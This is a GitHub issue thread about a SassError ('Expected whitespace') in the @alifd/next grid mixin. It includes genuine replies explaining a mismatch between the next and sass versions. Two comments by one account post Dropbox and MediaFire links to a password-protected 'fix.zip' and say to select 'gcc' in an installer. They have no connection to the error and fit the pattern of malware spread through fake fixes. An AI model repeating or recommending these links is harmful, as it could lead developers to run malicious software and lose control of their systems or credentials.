### ISSUE TITLE
SassError: Expected whitespace.

### ISSUE THREAD

**Issue by huyikun** [alibaba-fusion/next#4918]
### Steps to reproduce
node: v14.21.3
@alifd/next@1.24.18

报错信息如下，我否需要更新我的 sass-loader? 

ERROR in ./node_modules/@alifd/next/es/grid/main.scss (./node_modules/css-loader!./node_modules/sass-loader/dist/cjs.js??ref--14-2!./node_modules/@alifd/next-theme-loader??ref--14-3!./node_modules/@alifd/next/es/grid/main.scss)
    Module build failed (from ./node_modules/sass-loader/dist/cjs.js):
    SassError: Expected whitespace.
      ┌──> node_modules/@alifd/next/es/grid/scss/mixin.scss
    24│                 @media #{$query} { @content; }
      │                          ^^^^^^ 
      ╵
      ╷
    1 │ (min-width: 320px)and(max-width: 479px)
      │                      ━ error in interpolated output
      ╵
      node_modules/@alifd/next/es/grid/scss/mixin.scss 24:26  breakpoint()
      node_modules/@alifd/next/es/grid/scss/mixin.scss 147:9  visible-hidden-all-points()
      node_modules/@alifd/next/es/grid/main.scss 111:1        root stylesheet

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eternalsky** [comment]
这是因为你的 next 版本过低，有个语法新版 sass 已经废弃了。你应该是升级 next 而不是 sass，或者如果你不想升级 next，给 sass 降级才是正确方向。。

**Comment by Tyrael0403** [comment]
> 这是因为你的 next 版本过低，有个语法新版 sass 已经废弃了。你应该是升级 next 而不是 sass，或者如果你不想升级 next，给 sass 降级才是正确方向。。

都升级最新版，可复现问题
sass@1.78.0
@alifd/next@1.27.22
